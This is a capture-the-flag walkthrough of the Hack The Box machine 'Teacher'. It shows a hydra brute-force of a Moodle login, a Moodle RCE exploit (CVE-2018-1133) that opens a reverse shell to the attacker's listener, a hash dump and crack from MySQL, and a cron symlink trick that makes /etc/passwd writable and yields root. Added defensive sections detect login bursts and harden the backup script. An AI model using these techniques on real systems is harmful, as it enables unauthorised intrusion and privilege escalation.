Teacher
About
Teacher is a "medium" difficulty machine which teaches techniques for identifying and exploiting logical flaws and vulnerabilities in outdated modules of a popular CMS (in this instance Moodle), enumerating sensitive information in the backend database and leveraging misconfigurations on the operating system, which together lead to a complete compromise of the system.
Enumeration
Running the script portscan.sh reveals a single attack vector, HTTP on port 80.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ sudo portscan.sh 10.129.75.102
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ cat PortScan\(10.129.75.102\)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Blackhat highschool
|_http-server-header: Apache/2.4.25 (Debian)
Exploitation
HTTP
Accessing the page gallery.html shows a list of photos, but one of them is not rendered. Reading the page source reveals that the unrendered image is probably 5.png.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl -s http://10.129.75.102/gallery.html | grep 'img src' | sed -e 's/^[[:space:]]*//' | sort -V | uniq
<li><a href="#"><img src="images/5.png" alt=""></a></li>
<li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
<li><a href="#"><img src="images/5_2.png" alt=""></a></li>
<li><a href="#"><img src="images/5_3.png" alt=""></a></li>
<li><a href="#"><img src="images/5_4.png" alt=""></a></li>
<li><a href="#"><img src="images/5_5.png" alt=""></a></li>
<li><a href="#"><img src="images/5_6.png" alt=""></a></li>
<li><a href="#"><img src="images/5_7.png" alt=""></a></li>
<li><a href="#"><img src="images/5_8.png" alt=""></a></li>
<li><a href="#"><img src="images/5_9.png" alt=""></a></li>
<li><a href="#"><img src="images/5_10.png" alt=""></a></li>
<li><a href="#"><img src="images/5_11.png" alt=""></a></li>
<li><a href="#"><img src="images/5_12.png" alt=""></a></li>
<li><a href="#"><img src="images/5_13.png" alt=""></a></li>
<li><a href="#"><img src="images/5_14.png" alt=""></a></li>
<li><a href="#"><img src="images/5_15.png" alt=""></a></li>
<li><a href="#"><img src="images/5_16.png" alt=""></a></li>
By fetching the image 5.png, I find that it is actually a text file containing a partial password Th4C00lTheacha for a user Giovanni.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl http://10.129.75.102/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
In order to find a place to test the username and password, I'll perform a directory enumeration. Running gobuster reveals a directory moodle which seems interesting.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ gobuster dir -u http://10.129.75.102 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -f -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.75.102
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2024/01/08 20:07:00 Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 200) [Size: 15198]
/icons/ (Status: 403) [Size: 278]
/phpmyadmin/ (Status: 403) [Size: 278]
/moodle/ (Status: 303) [Size: 423] [--> http://teacher.htb/moodle]
/manual/ (Status: 200) [Size: 626]
/css/ (Status: 200) [Size: 932]
/js/ (Status: 200) [Size: 1351]
===============================================================
2024/01/08 20:31:18 Finished
===============================================================
Since gobuster revealed a domain teacher.htb, I'll add it to the file /etc/hosts for host resolution.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ diff /etc/hosts.bak /etc/hosts
10a11
> 10.129.75.102 teacher.htb
By accessing the redirection address http://teacher.htb/moodle, I'm able to find a Moodle site with a single course Algebra from the teacher Giovanni.
In order to login as Giovanni, I'll need to find the last character of the password. By creating a password list with crunch (one candidate per printable character appended to the known part, 95 lines in total) and brute-forcing the login form with hydra, I'm able to find the credential giovanni:Th4C00lTheacha#.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ crunch 15 15 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -t Th4C00lTheacha@ -o passwords.txt
Crunch will now generate the following amount of data: 1520 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 95
crunch: 100% completed generating output
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ hydra -l giovanni -P passwords.txt teacher.htb http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:F=Invalid login, please try again" -F
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-08 20:46:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking http-post-form://teacher.htb:80/moodle/login/index.php:username=^USER^&password=^PASS^:F=Invalid login, please try again
[80][http-post-form] host: teacher.htb login: giovanni password: Th4C00lTheacha#
[STATUS] attack finished for teacher.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-08 20:47:13
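As an added example that is not part of the original writeup, here is how a defender could spot a burst like the hydra run above in the web server's access log. It assumes Apache's combined log format, that a failed Moodle login re-renders the form with a 200 response and that a successful one answers with a 303 redirect (both status codes are assumptions of this example); the log lines are constructed for it.

```shell
#!/bin/sh
# Added example, not part of the original writeup: flag a login brute-force burst
# in Apache access-log lines. Assumptions: combined log format; a failed Moodle
# login POST returns 200 (form re-rendered), a successful one returns 303.

# Constructed sample: six failures from one client inside one minute, then the hit,
# plus one failure from an unrelated client.
SAMPLE_LOG='10.10.14.139 - - [08/Jan/2024:20:46:53 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:53 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:54 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:54 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:55 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:55 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0 (Hydra)"
10.10.14.139 - - [08/Jan/2024:20:46:56 +0000] "POST /moodle/login/index.php HTTP/1.1" 303 423 "-" "Mozilla/5.0 (Hydra)"
10.10.14.20 - - [08/Jan/2024:20:46:57 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 6044 "-" "Mozilla/5.0"
10.10.14.20 - - [08/Jan/2024:20:47:30 +0000] "GET /moodle/course/view.php?id=2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"'

# find_login_bursts LOGFILE THRESHOLD
# Prints "ip count" for every client whose failed login POSTs within one calendar
# minute reach THRESHOLD. Successful logins (303) and other paths are ignored.
find_login_bursts() {
    awk -v thr="$2" '
        $6 == "\"POST" && $7 == "/moodle/login/index.php" && $9 == "200" {
            # $4 looks like [08/Jan/2024:20:46:53 ; keep day, hour and minute only
            minute = substr($4, 2, 17)
            n[$1 " " minute]++
        }
        END {
            for (k in n)
                if (n[k] >= thr) {
                    split(k, parts, " ")
                    print parts[1], n[k]
                }
        }' "$1"
}

# Stand-alone run: write the constructed sample and report clients with five or
# more failures in a minute.
demo_log=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$demo_log"
find_login_bursts "$demo_log" 5
rm -f "$demo_log"
```

Run as-is it reports the constructed client; for a real site point find_login_bursts at the access log with a threshold that fits normal traffic. The hydra run above made 95 attempts in about twenty seconds, which a per-minute window catches easily; a slower guess rate needs a longer window or an account-level counter such as Moodle's own account lockout threshold.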
Now that I have the ability to login as giovanni, I'll need to find a way to gain RCE from Moodle using the teacher account. Running searchsploit-prettify.py reveals a vast number of exploits. After going through the list, I'll start by testing the exploit Moodle 3.4.1 - Remote Code Execution, as it seems to provide RCE to a user with a teacher role.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ searchsploit-prettify.py Moodle
--------------------------------------------------------------------------- -----------------------------------------------------
| Exploit Title | Path |
--------------------------------------------------------------------------- -----------------------------------------------------
| Mambo Component Mam-Moodle alpha - Remote File Inclusion | /usr/share/exploitdb/exploits/php/webapps/2064.txt |
| Moodle - Remote Command Execution (Metasploit) | /usr/share/exploitdb/exploits/linux/remote/29324.rb |
| Moodle 1.1/1.2 - Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24071.txt |
| Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | /usr/share/exploitdb/exploits/php/webapps/3508.txt |
| Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/29284.txt |
| Moodle 1.6dev - SQL Injection / Command Execution | /usr/share/exploitdb/exploits/php/webapps/1312.php |
| Moodle 1.7.1 - 'index.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/30261.txt |
| Moodle 1.8.3 - 'install.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/31020.txt |
| Moodle 1.8.4 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/6356.php |
| Moodle 1.9.3 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/7437.txt |
| Moodle 1.x - 'post.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24356.txt |
| Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/35297.txt |
| Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | /usr/share/exploitdb/exploits/php/webapps/28174.txt |
| Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/36418.txt |
| Moodle 2.7 - Persistent Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/34169.txt |
| Moodle 2.x/3.x - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/41828.php |
| Moodle 3.10.3 - 'label' Persistent Cross Site Scripting | /usr/share/exploitdb/exploits/php/webapps/49714.txt |
| Moodle 3.10.3 - 'url' Persistent Cross Site Scripting | /usr/share/exploitdb/exploits/php/webapps/49797.txt |
| Moodle 3.11.4 - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/50700.txt |
| Moodle 3.11.5 - SQLi (Authenticated) | /usr/share/exploitdb/exploits/php/webapps/50825.py |
| Moodle 3.4.1 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/46551.php |
| Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) | /usr/share/exploitdb/exploits/php/webapps/49814.txt |
| Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit) | /usr/share/exploitdb/exploits/php/remote/46775.rb |
| Moodle 3.8 - Unrestricted File Upload | /usr/share/exploitdb/exploits/php/webapps/49114.txt |
| Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) | /usr/share/exploitdb/exploits/php/webapps/50180.py |
| Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | /usr/share/exploitdb/exploits/php/webapps/8297.txt |
| Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/28770.txt |
| Moodle Filepicker 3.5.2 - Server Side Request Forgery | /usr/share/exploitdb/exploits/php/webapps/47177.txt |
| Moodle Help Script 1.x - Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24279.txt |
| Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/46881.txt |
| Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/46881.txt |
| Moodle LMS 4.0 - Cross-Site Scripting (XSS) | /usr/share/exploitdb/exploits/php/webapps/51115.txt |
--------------------------------------------------------------------------- -----------------------------------------------------
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ searchsploit -m /usr/share/exploitdb/exploits/php/webapps/46551.php
Exploit: Moodle 3.4.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/46551
Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
Codes: CVE-2018-1133
Verified: False
File Type: C++ source, ASCII text
Copied to: /home/m0nk3y/HTB/Teacher/46551.php
Reading the exploit shows that it requires a username, a password and a valid course ID belonging to a teacher. From the page source, I'm able to find that the course ID of Algebra is 2.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl -s http://teacher.htb/moodle/ | grep Algebra | xargs
<div role=main><span id=maincontent></span><a class=skip skip-block href=#skipavailablecourses>Skip available courses</a><div id=frontpage-course-list><h2>Available courses</h2><div class=courses frontpage-course-list-all><div class=coursebox clearfix odd first last data-courseid=2 data-type=1><div class=info><h3 class=coursename><a class= href=http://teacher.htb/moodle/course/view.php?id=2>Algebra</a></h3><div class=moreinfo></div></div><div class=content><ul class=teachers><li>Teacher: <a href=http://teacher.htb/moodle/user/view.php?id=3&course=1>Giovanni Chhatta</a></li></ul></div></div></div></div><span class=skip-block-to id=skipavailablecourses></span><br /></div>
Finally, by executing the exploit with the appropriate parameters, I'm able to gain a shell as the user www-data.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ php 46551.php url=http://teacher.htb/moodle user=giovanni pass=Th4C00lTheacha# ip=10.10.14.139 port=4444 course=2
*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*
[!] Make sure you have a listener
[!] at 10.10.14.139:4444
[*] Logging in as user giovanni with password Th4C00lTheacha#
[+] Successful Login
[>] Moodle Session te84mjjrgv654i3ra8trmoj3m5
[>] Moodle Key buL482m1y3
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[+] Successfully Created Evil Question
[*] Sending Exploit
[>] You should receive a reverse shell attempt from the target at 10.10.14.139 on port 4444
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ nc -s 10.10.14.139 -nlvp 4444
listening on [10.10.14.139] 4444 ...
connect to [10.10.14.139] from (UNKNOWN) [10.129.75.102] 54862
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Lateral Movement
After a bit of enumeration, I'm able to find a file config.php which contains a credential root:Welkom1! for MySQL.
$ cat /var/www/html/moodle/config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://teacher.htb/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
By spawning a TTY shell and using the credential found, I'm able to login to MySQL as root. Inside the database moodle, there is a table mdl_user which contains a password hash 7a860966115182402ed06375cf0a22af for a newly found user Giovannibak; it seems to be hashed with a different algorithm than the other hashes (32 hex characters rather than the $2y$ bcrypt format of the rest).
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@teacher:/var/www/html/moodle/question$ mysql -uroot -pWelkom1! -Dmoodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 496
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
Next, with john, I'm able to crack the password hash to find the password expelled for the user giovanni.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ john hashes.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
expelled (?)
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Finally, by switching the user to giovanni with the credential retrieved, I'm able to gain a shell as the user giovanni.
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
Privilege Escalation
After a bit more enumeration, I'm able to find a file backup.sh which seems to be a custom script used for course backups. Furthermore, the file backup_courses.tar.gz changing every minute reveals that the script is run as root every minute.
giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
Now that I know what kind of commands are run as root, I'll check whether I'm allowed to make a symbolic link to the file /etc/passwd in /home/giovanni/work/tmp. Unfortunately, this attempt fails, as chmod does not change the permissions of the file a symbolic link points to during recursive directory traversals, according to chmod(1) - Linux man page.
As the initial attempt failed, I need to look for an alternative way to abuse the script. Since the script performs cd tmp and then changes the permissions of all files within that directory, I'll be able to replace the directory itself with a link to /etc and make the script turn /etc/passwd world-writable. To do so, I'll erase the directory /home/giovanni/work/tmp and make a new symbolic link to /etc as /home/giovanni/work/tmp.
giovanni@teacher:/var/www/html/moodle/question$ rm -rf /home/giovanni/work/tmp
giovanni@teacher:/var/www/html/moodle/question$ ln -s /etc /home/giovanni/work/tmp
After some waiting, I can find that the permissions on /etc/passwd have changed. As the file /etc/passwd is now world-writable, I'll update the password for the user root to pwn.
giovanni@teacher:/var/www/html/moodle/question$ ls -al /etc/passwd
ls -al /etc/passwd
-rwxrwxrwx 1 root root 1450 Jun 27 2018 /etc/passwd
giovanni@teacher:/var/www/html/moodle/question$ ex "+set nobackup nowritebackup" "+%s/^root:[^:]\+:/root:$(openssl passwd -salt root -1 pwn):/" -scwq /etc/passwd
Finally, by switching to the super user with the updated password, I'm able to gain a shell as the user root.
giovanni@teacher:/var/www/html/moodle/question$ su
su
Password: pwn
root@teacher:/var/www/html/moodle/question# id
id
uid=0(root) gid=0(root) groups=0(root)
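The root cron job above fails in two ways: `cd tmp` happily follows a symlink that the unprivileged owner of the parent directory planted, and `chmod 777 * -R` then opens whatever that link points at. As an added example that is not the box's /usr/bin/backup.sh, here is a replacement that refuses to operate through a symlink, works with absolute paths instead of cd, and tightens rather than opens permissions. The work/courses and work/tmp layout follows the page; the function names and the demo tree are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the box's /usr/bin/backup.sh: a hardened replacement for the
# course backup job. Layout (WORKDIR/courses, WORKDIR/tmp) follows the writeup;
# function names and the throwaway demo tree are assumptions of this example.

# require_real_dir PATH
# Succeeds only when PATH is a directory and not a symbolic link. The original
# script's `cd tmp` follows a link, which is how tmp -> /etc redirected the
# recursive chmod onto /etc/passwd.
require_real_dir() {
    if [ -L "$1" ]; then
        echo "backup: refusing to use symlink $1" >&2
        return 1
    fi
    if [ ! -d "$1" ]; then
        echo "backup: $1 is not a directory" >&2
        return 1
    fi
    return 0
}

# run_backup WORKDIR
# Archives WORKDIR/courses into WORKDIR/tmp and unpacks it there, using tar's -C
# instead of cd, and leaving nothing world-writable.
run_backup() {
    work="$1"
    require_real_dir "$work" || return 1
    require_real_dir "$work/courses" || return 1
    require_real_dir "$work/tmp" || return 1
    tar -czf "$work/tmp/backup_courses.tar.gz" -C "$work" courses || return 1
    tar -xf "$work/tmp/backup_courses.tar.gz" -C "$work/tmp" || return 1
    # u=rwX,go=rX: directories traversable, files readable, no world-write bit.
    # chmod -R does not descend into symlinks (chmod(1)), so a link planted
    # inside courses/ is left untouched as well.
    chmod -R u=rwX,go=rX "$work/tmp/courses"
}

# Stand-alone demo on a throwaway tree: one honest run, then the symlink swap
# from the writeup, which the checks reject.
demo=$(mktemp -d)
mkdir -p "$demo/work/courses" "$demo/work/tmp"
echo "algebra" > "$demo/work/courses/algebra.txt"
run_backup "$demo/work" && echo "backup ok: $(ls "$demo/work/tmp/courses")"
rm -rf "$demo/work/tmp"
ln -s "$demo/etc" "$demo/work/tmp"
run_backup "$demo/work" || echo "symlink swap rejected"
rm -rf "$demo"
```

The checks close the hole the writeup uses, but a race remains: the owner of /home/giovanni/work can swap tmp for a link between the test and the tar or chmod call. The durable fix is the one the page's own finding points at, namely not running a job over a user-writable tree as root at all (run it as giovanni from that user's crontab, or with a dedicated service account that owns the work directory), so that a redirected chmod can only touch files the user already controls.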
Post Exploitation
With the shell acquired, I'm able to read the flags user.txt and root.txt.
root@teacher:/var/www/html/moodle/question# cat /home/giovanni/user.txt
cat /home/giovanni/user.txt
723d8e72b16f82e0c64014277bade87e
root@teacher:/var/www/html/moodle/question# cat /root/root.txt
cat /root/root.txt
0e2aad7a89e93920e83a0a4e1d82e71c